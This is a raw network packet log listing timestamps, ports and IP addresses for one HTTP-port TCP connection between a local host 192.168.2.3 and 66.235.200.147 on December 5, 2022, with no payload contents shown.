Dec 5, 2022 01:32:37.977238894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977432966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977462053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977490902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977498055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977508068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977526903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977540016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977550983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977571011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977576017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977588892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977606058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977607012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977623940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977626085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977641106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977643013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977655888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977658987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977674007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977677107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977691889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977694988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977709055 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977714062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977727890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977746964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977768898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977798939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977904081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977921009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.977941990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977952003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.977998018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978027105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978033066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978060961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978070021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978101969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978261948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978276968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978297949 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978306055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978312969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978342056 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978372097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978389025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978406906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978425980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978441000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978475094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978494883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978512049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978528976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978529930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978545904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978560925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978565931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978590012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978616953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978632927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978636980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978662968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978698015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978703022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978739023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978744984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978780031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978785992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978804111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978820086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.978821039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978838921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978857994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.978980064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979015112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979021072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979058027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979059935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979090929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979094028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979110003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979127884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979146004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979213953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979231119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979248047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979249954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979266882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979279995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979284048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979299068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979316950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979338884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979347944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979363918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979366064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979387999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979404926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979413033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979439974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979473114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979490995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979510069 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979523897 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979525089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979542017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979557991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979559898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979578972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979578972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979595900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979597092 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979612112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979617119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979645014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979652882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979662895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979672909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979686975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979690075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979706049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979708910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979726076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979726076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979743958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979743958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979758978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979763985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979782104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979783058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979799986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979799986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979815960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979820013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979835033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979837894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979856968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979856968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979876041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979876041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979890108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979896069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979911089 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979914904 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979933023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979949951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979952097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979969978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.979974031 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.979988098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980007887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980010033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980026007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980029106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980043888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980047941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980062008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980070114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980079889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980098009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980098009 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980115891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980119944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980134010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980143070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980151892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980156898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980170012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980174065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980195045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980200052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980201960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980216980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980233908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980249882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980249882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980268002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980276108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980300903 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980493069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980509043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980529070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980547905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980551958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.980590105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.980623960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.981597900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981615067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981637955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.981667995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.981781006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981796980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981813908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981829882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981861115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.981893063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981900930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.981910944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981945992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981945992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.981962919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.981980085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982007027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982062101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982079029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982096910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982110977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982145071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982161999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982178926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982192993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982717991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982754946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982781887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982798100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982814074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.982815027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982830048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.982848883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983371973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983390093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983413935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983428955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983458996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983477116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983511925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983553886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983589888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983594894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983612061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983628035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983628035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983649969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983665943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983670950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983711958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983726978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983727932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983746052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983751059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983768940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983778000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983786106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983795881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983814001 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983830929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983860970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983876944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983894110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983896017 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983911991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983928919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.983982086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.983999014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984013081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984029055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984030008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984060049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984064102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984077930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984091997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984127998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984137058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984168053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984184980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984201908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984217882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984220028 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984239101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984249115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984262943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984297037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984325886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984343052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984359026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984360933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984380960 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984396935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984451056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984467983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984497070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984500885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984513998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984532118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984559059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984669924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984704018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984745979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984764099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984780073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984781027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984797001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984802008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984811068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984814882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984833002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984834909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984846115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984848976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984867096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984867096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984884024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984884977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984900951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984903097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984920025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984955072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984961033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.984973907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.984991074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985007048 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985016108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985033035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985054970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985063076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985064983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985096931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985105038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985121965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985136986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985143900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985177040 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985178947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985219002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985244989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985260963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985276937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985291004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985306025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985321045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985342979 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985351086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985385895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985425949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985469103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985486031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.985518932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.985541105 CET	80	49705	66.235.200.147	192.168.2.3
